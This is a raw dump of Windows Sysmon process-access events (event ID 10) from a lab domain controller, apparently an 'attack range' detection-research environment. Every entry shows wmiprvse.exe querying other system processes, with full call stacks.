13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005215Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005214Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005213Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005212Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005211Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005210Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005209Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005208Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005207Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005206Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005205Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005204Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005203Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005202Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x80000000000000005201Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.064{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000005200Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 